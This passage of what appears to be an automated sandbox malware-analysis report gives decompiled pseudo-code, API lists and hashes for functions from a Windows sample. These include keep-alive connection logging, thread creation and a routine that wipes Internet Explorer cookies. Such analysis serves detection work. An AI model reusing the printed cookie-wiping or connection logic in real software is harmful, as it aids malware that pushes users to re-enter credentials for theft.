                                            Function 004154E8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 174COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 97%
                                            			E004154E8(short* __edx) {
				signed int _v8;
				intOrPtr _v12;
				short* _v16;
				short _v20;
				char _v24;
				intOrPtr _v28;
				char _v80;
				void* _t45;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				char _t68;
				char _t69;
				char* _t70;
				signed int _t71;
				short* _t72;
				signed int _t76;
				char* _t79;
				char* _t81;
				intOrPtr _t82;
				char* _t85;
				void* _t86;
				void* _t89;
				intOrPtr _t91;
				char* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_v16 = __edx;
				_v8 = _v8 & 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = E00408A88();
				_t85 = "TLS_AES_128_GCM_SHA256";
				if(__edx == 0) {
					L37:
					return 0;
				}
				_t45 = E00430CF0(_t85, "ALL", 3);
				_t97 = _t96 + 0xc;
				if(_t45 == 0) {
					L36:
					return 1;
				}
				_t48 = E00430CF0(_t85, "DEFAULT", 7);
				_t98 = _t97 + 0xc;
				if(_t48 == 0) {
					goto L36;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t85;
					_t86 = E0042AF80(_t85, 0x45aee0);
					if(_t86 != 0) {
						_t76 = _t86 - _t70;
						L8:
						if(_t76 <= 0x31) {
							if(_t86 != 0) {
								_t89 = _t86 - _t70;
								L15:
								E004334C0( &_v80, _t70, _t89);
								_t98 = _t98 + 0xc;
								_t11 = _t89 - 1; // -1
								_t90 =  ==  ? _t11 : _t89;
								_t71 = 0;
								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
								if(_v28 <= 0) {
									L20:
									_t72 = _v16;
									_t91 = _v12;
									goto L21;
								}
								_t93 = 0x455f64;
								while(1) {
									_t59 = E00430CF0( &_v80,  *((intOrPtr*)(_t93 - 4)), 0x31);
									_t98 = _t98 + 0xc;
									if(_t59 == 0) {
										break;
									}
									_t67 = E00430CF0( &_v80,  *_t93, 0x31);
									_t98 = _t98 + 0xc;
									if(_t67 == 0) {
										break;
									}
									_t71 = _t71 + 1;
									_t93 = _t93 + 0xc;
									if(_t71 < _v28) {
										continue;
									}
									goto L20;
								}
								_t82 = _v20;
								if(_t82 >= 0x12b) {
									goto L37;
								}
								_t76 = _t71 * 0xc;
								_t72 = _v16;
								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x455f68));
								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x455f69));
								_t62 =  *((intOrPtr*)(_t76 + 0x455f68));
								_v20 = _t82 + 2;
								if(_t62 == 0x13) {
									L34:
									_v8 = 1;
									L35:
									_t91 = 1;
									_v12 = 1;
									goto L21;
								}
								if(_t62 != 0xc0) {
									L30:
									if(_v8 != 0) {
										L32:
										if(_v24 == 0) {
											_v24 = 1;
										}
										goto L35;
									}
									_t64 = E0042AF80( &_v80, "ECDSA");
									_pop(_t76);
									if(_t64 != 0) {
										goto L34;
									}
									goto L32;
								}
								_t65 =  *((intOrPtr*)(_t76 + 0x455f69));
								if(_t65 == 0xb4 || _t65 == 0xb5) {
									goto L34;
								} else {
									goto L30;
								}
							}
							_t92 = _t70;
							_t76 =  &(_t92[1]);
							do {
								_t68 =  *_t92;
								_t92 =  &(_t92[1]);
							} while (_t68 != 0);
							_t89 = _t92 - _t76;
							goto L15;
						}
						_t89 = 0x31;
						goto L15;
					}
					_t79 = _t70;
					_t81 =  &(_t79[1]);
					do {
						_t69 =  *_t79;
						_t79 =  &(_t79[1]);
					} while (_t69 != 0);
					_t76 = _t79 - _t81;
					goto L8;
					L21:
					_t85 = _t86 + 1;
				} while (_t86 != 0);
				if(_t91 != 0) {
					_push(_t76);
					 *_t72 = _v20;
					 *((char*)(_t72 + 0x154)) = 1;
					E00412B02(_t72, _v8, _v24, _t76, 1);
				}
				return _t91;
			}




































                                            0x004154f1
                                            0x004154f4
                                            0x004154fa
                                            0x004154fe
                                            0x00415501
                                            0x00415509
                                            0x0041550c
                                            0x00415513
                                            0x004156b3
                                            0x00000000
                                            0x004156b3
                                            0x00415521
                                            0x00415526
                                            0x0041552b
                                            0x004156ae
                                            0x00000000
                                            0x004156b0
                                            0x00415539
                                            0x0041553e
                                            0x00415543
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00415549
                                            0x00415549
                                            0x0041554f
                                            0x00415556
                                            0x0041555c
                                            0x00415570
                                            0x00415572
                                            0x00415575
                                            0x0041557e
                                            0x00415592
                                            0x00415594
                                            0x0041559a
                                            0x0041559f
                                            0x004155a2
                                            0x004155a8
                                            0x004155ab
                                            0x004155ad
                                            0x004155b5
                                            0x004155ee
                                            0x004155ee
                                            0x004155f1
                                            0x00000000
                                            0x004155f1
                                            0x004155b7
                                            0x004155bc
                                            0x004155c5
                                            0x004155ca
                                            0x004155cf
                                            0x00000000
                                            0x00000000
                                            0x004155d9
                                            0x004155de
                                            0x004155e3
                                            0x00000000
                                            0x00000000
                                            0x004155e5
                                            0x004155e6
                                            0x004155ec
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004155ec
                                            0x0041562c
                                            0x00415635
                                            0x00000000
                                            0x00000000
                                            0x00415637
                                            0x0041563a
                                            0x00415643
                                            0x0041564d
                                            0x00415654
                                            0x0041565a
                                            0x0041565f
                                            0x0041569c
                                            0x0041569c
                                            0x004156a3
                                            0x004156a5
                                            0x004156a6
                                            0x00000000
                                            0x004156a6
                                            0x00415663
                                            0x00415673
                                            0x00415677
                                            0x0041568d
                                            0x00415691
                                            0x00415693
                                            0x00415693
                                            0x00000000
                                            0x00415691
                                            0x00415682
                                            0x00415688
                                            0x0041568b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0041568b
                                            0x00415665
                                            0x0041566d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0041566d
                                            0x00415580
                                            0x00415582
                                            0x00415585
                                            0x00415585
                                            0x00415587
                                            0x00415588
                                            0x0041558c
                                            0x00000000
                                            0x0041558c
                                            0x00415579
                                            0x00000000
                                            0x00415579
                                            0x0041555e
                                            0x00415560
                                            0x00415563
                                            0x00415563
                                            0x00415565
                                            0x00415566
                                            0x0041556a
                                            0x00000000
                                            0x004155f4
                                            0x004155f6
                                            0x004155f7
                                            0x00415601
                                            0x00415609
                                            0x0041560d
                                            0x00415616
                                            0x0041561d
                                            0x00415622
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _strncpy
                                            • String ID: ALL$DEFAULT$ECDSA$HSE$TLS_AES_128_GCM_SHA256
                                            • API String ID: 2961919466-4211922392
                                            • Opcode ID: 42fdec5028d1327ab7717584f3ea2f21db6bbb85feea7c88aede2f4f763f88ae
                                            • Instruction ID: d7876cd000e69a6f76516b2c393d6ef91755aabb7095b330ec6e2e36d61e561a
                                            • Opcode Fuzzy Hash: 42fdec5028d1327ab7717584f3ea2f21db6bbb85feea7c88aede2f4f763f88ae
                                            • Instruction Fuzzy Hash: 63513971E04605EFDF208EA488817FFBB769B84304F58016FDC48AB346E2798986C7D9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043A421, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E0043A421(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x45f014; // 0x8d941b67
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x460720 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x460720 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E0043694C(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x460720 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x460720 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x460720 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00438897( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00438897();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E004294CB(_v8 ^ _t136);
			}


































                                            0x0043a429
                                            0x0043a430
                                            0x0043a433
                                            0x0043a43b
                                            0x0043a43f
                                            0x0043a44b
                                            0x0043a44e
                                            0x0043a451
                                            0x0043a458
                                            0x0043a460
                                            0x0043a463
                                            0x0043a469
                                            0x0043a46f
                                            0x0043a474
                                            0x0043a476
                                            0x0043a479
                                            0x0043a47e
                                            0x0043a488
                                            0x0043a48f
                                            0x0043a492
                                            0x0043a499
                                            0x0043a4a0
                                            0x0043a4cc
                                            0x0043a4f2
                                            0x0043a4f4
                                            0x00000000
                                            0x0043a4ce
                                            0x0043a4d1
                                            0x0043a598
                                            0x0043a5a4
                                            0x0043a5af
                                            0x0043a5b4
                                            0x0043a4d7
                                            0x0043a4de
                                            0x0043a4e3
                                            0x0043a4e9
                                            0x0043a4ef
                                            0x00000000
                                            0x0043a4ef
                                            0x0043a4e9
                                            0x0043a4d1
                                            0x0043a4a2
                                            0x0043a4a6
                                            0x0043a4a9
                                            0x0043a4af
                                            0x0043a4b1
                                            0x0043a4b4
                                            0x0043a4b8
                                            0x0043a4f5
                                            0x0043a4f8
                                            0x0043a4f9
                                            0x0043a4fe
                                            0x0043a504
                                            0x0043a50a
                                            0x0043a519
                                            0x0043a51f
                                            0x0043a525
                                            0x0043a52a
                                            0x0043a546
                                            0x0043a5b9
                                            0x0043a5bf
                                            0x0043a548
                                            0x0043a550
                                            0x0043a559
                                            0x0043a55f
                                            0x00000000
                                            0x0043a561
                                            0x0043a563
                                            0x0043a566
                                            0x0043a57f
                                            0x00000000
                                            0x0043a581
                                            0x0043a585
                                            0x0043a587
                                            0x0043a58a
                                            0x00000000
                                            0x0043a58a
                                            0x0043a585
                                            0x0043a57f
                                            0x0043a55f
                                            0x0043a559
                                            0x0043a546
                                            0x0043a52a
                                            0x0043a504
                                            0x00000000
                                            0x0043a58d
                                            0x0043a58d
                                            0x0043a5c1
                                            0x0043a5d3

                                            APIs
                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0043AB96,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0043A463
                                            • __fassign.LIBCMT ref: 0043A4DE
                                            • __fassign.LIBCMT ref: 0043A4F9
                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0043A51F
                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0043AB96,00000000,?,?,?,?,?,?,?,?,?,0043AB96,?), ref: 0043A53E
                                            • WriteFile.KERNEL32(?,?,00000001,0043AB96,00000000,?,?,?,?,?,?,?,?,?,0043AB96,?), ref: 0043A577
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                            • String ID:
                                            • API String ID: 1324828854-0
                                            • Opcode ID: d24d693e3e4152a1e106fa619162d49d3988aa9a4ce325a6df8d33e27abefdc1
                                            • Instruction ID: 808c9c299079e9589db87d45f3f9d9c30cd50765893cbf97c1b55851f28467d1
                                            • Opcode Fuzzy Hash: d24d693e3e4152a1e106fa619162d49d3988aa9a4ce325a6df8d33e27abefdc1
                                            • Instruction Fuzzy Hash: 6651E670900205AFCB10CFA8D885AEEBBF8FF0D300F14412BE991E7251E774A951CB6A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401C99, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 112timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E00401C99(intOrPtr _a4) {
				struct _SYSTEMTIME _v24;
				char _v48;
				char _v72;
				void* __ebx;
				intOrPtr _t84;
				void* _t85;
				void* _t91;

				if( *0x461448 == 0) {
					__eflags = 0;
					return 0;
				}
				_t84 = _a4;
				if( *0x460a94 == 0) {
					L7:
					 *0x461458 =  *0x461458 & 0x00000000;
					 *0x46145d = 1;
					 *0x461454 = _t84;
					return 1;
				}
				_t90 =  *0x46145c;
				_t62 = "%02i:%02i:%02i:%03i [Info] ";
				if( *0x46145c != 0) {
					GetLocalTime( &_v24);
					_push(_v24.wMilliseconds & 0x0000ffff);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					E00401404(_t90, E00401F2E(E00402973(_t62,  &_v48, E0040207E("%02i:%02i:%02i:%03i [Info] ",  &_v72, _t62), _t90, "Connection KeepAlive enabled\n")), _v24.wHour & 0x0000ffff);
					E00401F97();
					E00401F97();
					_push(_t84);
					_push(_v24.wMilliseconds & 0x0000ffff);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					E00401404(_t90, E00401F2E(E00402973(_t62,  &_v72, E0040207E(_t62,  &_v48, _t62), _t90, "Connection KeepAlive timeout: %i\n")), _v24.wHour & 0x0000ffff);
					_t85 = _t85 + 0x2c;
					E00401F97();
					E00401F97();
					 *0x46145c = 0;
				}
				_t91 =  *0x461454 - _t84; // 0x0
				if(_t91 != 0) {
					_t92 =  *0x46145d;
					if( *0x46145d != 0) {
						GetLocalTime( &_v24);
						_push(_t84);
						_push(_v24.wMilliseconds & 0x0000ffff);
						_push(_v24.wSecond & 0x0000ffff);
						_push(_v24.wMinute & 0x0000ffff);
						E00401404(_t92, E00401F2E(E00402973(_t62,  &_v72, E0040207E(_t62,  &_v48, _t62), _t92, "KeepAlive timeout changed to %i\n")), _v24.wHour & 0x0000ffff);
						E00401F97();
						E00401F97();
					}
				}
				goto L7;
			}










                                            0x00401ca8
                                            0x00401dfd
                                            0x00000000
                                            0x00401dfd
                                            0x00401cb5
                                            0x00401cb8
                                            0x00401de5
                                            0x00401de5
                                            0x00401dee
                                            0x00401df5
                                            0x00000000
                                            0x00401df5
                                            0x00401cbe
                                            0x00401cc5
                                            0x00401cca
                                            0x00401cd4
                                            0x00401ce1
                                            0x00401ce6
                                            0x00401ceb
                                            0x00401d0f
                                            0x00401d1a
                                            0x00401d22
                                            0x00401d2e
                                            0x00401d2f
                                            0x00401d34
                                            0x00401d39
                                            0x00401d5d
                                            0x00401d62
                                            0x00401d68
                                            0x00401d70
                                            0x00401d75
                                            0x00401d75
                                            0x00401d7c
                                            0x00401d82
                                            0x00401d84
                                            0x00401d8b
                                            0x00401d91
                                            0x00401d9e
                                            0x00401d9f
                                            0x00401da4
                                            0x00401da9
                                            0x00401dcd
                                            0x00401dd8
                                            0x00401de0
                                            0x00401de0
                                            0x00401d8b
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: LocalTime
                                            • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i$KeepAlive timeout changed to %i
                                            • API String ID: 481472006-2341810981
                                            • Opcode ID: f2c1f05aafad996bc493386904da00bf3b19f84b644e1197f5ace652a61357b7
                                            • Instruction ID: b080295803392fd838d1e554ddb1812fc21fb4770989e13ac54d6c54d497b4b4
                                            • Opcode Fuzzy Hash: f2c1f05aafad996bc493386904da00bf3b19f84b644e1197f5ace652a61357b7
                                            • Instruction Fuzzy Hash: 5A4183A5D002086ACB10FBE6D845AFEB7B89F18309F14407BF501B60F2EA7C6A44D769
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401B86, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96timethreadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 69%
                                            			E00401B86(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __ebx;
				intOrPtr _t66;
				void* _t68;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x50)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t66 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x460a94;
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_t50 = "%02i:%02i:%02i:%03i [Info] ";
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E00401404(__eflags, E00401F2E(E00402973(_t50,  &_v44, E0040207E("%02i:%02i:%02i:%03i [Info] ",  &_v68, _t50), __eflags, "Connection KeepAlive enabled\n")), _v20.wHour & 0x0000ffff);
						E00401F97();
						E00401F97();
						_push(_t66);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E00401404(__eflags, E00401F2E(E00402973(_t50,  &_v68, E0040207E(_t50,  &_v44, _t50), __eflags, "Connection KeepAlive timeout: %i\n")), _v20.wHour & 0x0000ffff);
						E00401F97();
						E00401F97();
					}
				} else {
					 *((char*)(__ecx + 0x64)) = 1;
				}
				 *((intOrPtr*)(_t68 + 0x5c)) = _t66;
				 *((char*)(_t68 + 0x50)) = 1;
				 *((intOrPtr*)(_t68 + 0x54)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, E00401E76, _t68, 0, 0);
				return 1;
			}









                                            0x00401b8e
                                            0x00401b95
                                            0x00401c8e
                                            0x00000000
                                            0x00401c8e
                                            0x00401b9f
                                            0x00401ba2
                                            0x00401bad
                                            0x00401bb4
                                            0x00401bbe
                                            0x00401bcb
                                            0x00401bd0
                                            0x00401bd5
                                            0x00401bda
                                            0x00401bfe
                                            0x00401c09
                                            0x00401c11
                                            0x00401c1d
                                            0x00401c1e
                                            0x00401c23
                                            0x00401c28
                                            0x00401c4c
                                            0x00401c57
                                            0x00401c5f
                                            0x00401c5f
                                            0x00401ba4
                                            0x00401ba4
                                            0x00401ba4
                                            0x00401c64
                                            0x00401c6d
                                            0x00401c81
                                            0x00401c84
                                            0x00000000

                                            APIs
                                            • GetLocalTime.KERNEL32(?), ref: 00401BBE
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401C71
                                            • CreateThread.KERNEL32(00000000,00000000,00401E76,?,00000000,00000000), ref: 00401C84
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Create$EventLocalThreadTime
                                            • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
                                            • API String ID: 2532271599-119634454
                                            • Opcode ID: 431839598a55916cb1cccc8e7990486a2ec6edd7d7d9699e40c207041a5dd39c
                                            • Instruction ID: 98f3925eb314ffa50290d0b526d3b2fa4b0139c130e23adfea5547ebc9b0e6eb
                                            • Opcode Fuzzy Hash: 431839598a55916cb1cccc8e7990486a2ec6edd7d7d9699e40c207041a5dd39c
                                            • Instruction Fuzzy Hash: F1318461900344BADB10ABA6CC09DFFBBBCAB55709F00046FF841B21E2DABC9945D778
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004078C0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E004078C0(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				int _t34;
				int _t37;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t60;
				void* _t62;
				void* _t63;

				_t42 =  &_v28;
				E004020CF(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E0040B7C3( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t63 = _t62 + 0xc;
				E00401FA1( &_v28, 0x80000001, _t60, _t17);
				E00401F97();
				if(E00403C62(0x4554cc) == 0) {
					ExpandEnvironmentStringsA(E00401F2E( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E0040207E(0,  &_v52,  &_v340);
						_t34 = E0041146E(L00404090(E00411130( &_v76,  &_v52, __eflags)));
						E004031D1();
						_t55 =  &_v52;
						E00401F97();
						__eflags = _t34;
						if(_t34 == 0) {
							_push(_t55);
							_push(_t55);
							_t37 = E00407B56();
							__eflags = _t37;
							if(_t37 != 0) {
								_t41 = 1;
								E0040207E(1, _t63 - 0x18, "\n[IE cookies cleared!]");
								E00407B4A();
								goto L8;
							}
						} else {
							_t48 = _t63 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t63 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E0040207E(_t41, _t48);
					E00407B4A();
					_t41 = 1;
					L8:
				}
				E00401F97();
				return _t41;
			}





















                                            0x004078c9
                                            0x004078ce
                                            0x004078d3
                                            0x004078e6
                                            0x004078e8
                                            0x004078ed
                                            0x004078f4
                                            0x004078fc
                                            0x00407910
                                            0x00407942
                                            0x00407955
                                            0x00407957
                                            0x00000000
                                            0x00407959
                                            0x00407963
                                            0x0040797c
                                            0x00407986
                                            0x0040798b
                                            0x0040798e
                                            0x00407993
                                            0x00407995
                                            0x004079a6
                                            0x004079a7
                                            0x004079a8
                                            0x004079ad
                                            0x004079af
                                            0x004079b4
                                            0x004079bd
                                            0x004079c2
                                            0x00000000
                                            0x004079c2
                                            0x00407997
                                            0x0040799a
                                            0x0040799c
                                            0x00000000
                                            0x0040799c
                                            0x00407995
                                            0x00407912
                                            0x00407912
                                            0x00407915
                                            0x00407917
                                            0x0040791c
                                            0x0040791c
                                            0x00407921
                                            0x00407926
                                            0x004079c7
                                            0x004079c7
                                            0x004079cd
                                            0x004079d9

                                            APIs
                                              • Part of subcall function 0040B7C3: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 0040B7E5
                                              • Part of subcall function 0040B7C3: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 0040B804
                                              • Part of subcall function 0040B7C3: RegCloseKey.ADVAPI32(?), ref: 0040B80D
                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 00407942
                                            • PathFileExistsA.SHLWAPI(?), ref: 0040794F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                            • API String ID: 1133728706-4073444585
                                            • Opcode ID: 42dfc04b841944d5690f813cc0f909d9b500d5c3f017278a02b416bf30817292
                                            • Instruction ID: f4329bcb0edd3d5aa716c51ac512851a87c852736f97098ecd9b68e8b258909f
                                            • Opcode Fuzzy Hash: 42dfc04b841944d5690f813cc0f909d9b500d5c3f017278a02b416bf30817292
                                            • Instruction Fuzzy Hash: EA21AE70E502056ACB04B7B1CC6A9FE7728AF41308F40016FA901771D2EA7C6A49CA9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004466B3, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E004466B3(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E00437E1E(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E00436F33(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E004328DE(GetLastError());
								}
							}
							E00437795(_t40);
							_t14 = _t35;
						} else {
							E004328DE(GetLastError());
							_t14 = 0;
						}
					} else {
